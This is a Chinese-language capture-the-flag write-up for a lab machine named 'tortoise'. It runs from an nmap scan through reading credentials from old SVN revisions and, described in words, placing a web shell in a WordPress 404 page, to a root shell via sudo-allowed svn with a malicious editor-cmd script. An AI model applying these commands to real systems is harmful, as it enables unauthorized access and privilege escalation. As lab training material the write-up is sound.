群友靶机tortoise wp - 场

nmap -p- 192.168.10.5
Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-30 04:52 EST
Nmap scan report for tortoise.dsz (192.168.10.5)
Host is up (0.00073s latency).
Not shown: 65532 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
3690/tcp open  svn
MAC Address: 08:00:27:D5:23:F7 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

添加一下域名，80端口是个WordPress。

感觉突破口在SVN服务上。但是需要得到用户名和密码。然后翻翻文章。http://tortoise.dsz/2026/01/23/a-comprehensive-guide-to-subversion-svn在这里面发现了用户名和密码的设计方式。发现有harry:harryssecret另外一个sally的密码设计也是同理。

svn list -R svn://192.168.10.5/ --username harry --password harryssecret
config.php
svn cat svn://192.168.10.5/config.php --username harry --password harryssecret                  
db_user=getenv('DB_USER');\ndb_pass=getenv('DB_PASS');

发现没有什么有用信息。接下来考虑上传webshell。然后发现不可行。然后看看日志，发现了admin的密码

┌──(kali㉿kali)-[~/Desktop]
└─$ svn log -v svn://192.168.10.5/ --username harry --password harryssecret       
------------------------------------------------------------------------
r2 | root | 2026-01-23 07:13:55 -0500 (Fri, 23 Jan 2026) | 1 line
Changed paths:M /config.phpRemove hardcoded credentials for security
------------------------------------------------------------------------
r1 | root | 2026-01-23 07:13:54 -0500 (Fri, 23 Jan 2026) | 1 line
Changed paths:A /config.phpInitialize database config
------------------------------------------------------------------------                                                      
┌──(kali㉿kali)-[~/Desktop]
└─$ svn cat -r 1 svn://192.168.10.5/config.php --username harry --password harryssecret
db_user='admin'\ndb_pass='S3cret_P@ss_2026'

接下来就是打WordPress了，404页面写马，蚁剑连。

在/var/www/localhost/.backup.php中发现define('SECURE_KEY', '1006b3921');猜测是用户密码，果真。

发现可以SVN提权。

                                         
Tortoise:~$ sudo -l
[sudo] password for onehang: 
Matching Defaults entries for onehang on Tortoise:secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/binRunas and Command-specific defaults for onehang:Defaults!/usr/sbin/visudo env_keep+="SUDO_EDITOR EDITOR VISUAL"User onehang may run the following commands on Tortoise:(ALL : ALL) /usr/bin/svn
Tortoise:~$ cd /tmp
Tortoise:/tmp$ vim exploit.sh 
Tortoise:/tmp$ cat exploit.sh 
#!/bin/sh
/bin/sh
Tortoise:/tmp$ chmod +x exploit.sh 
Tortoise:/tmp$ sudo /usr/bin/svn commit --editor-cmd /tmp/exploit.sh
/tmp # id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)
/tmp # cat /root/root.txt
flag{root-0b09d631dfda5e9d87a422fc17c1e286}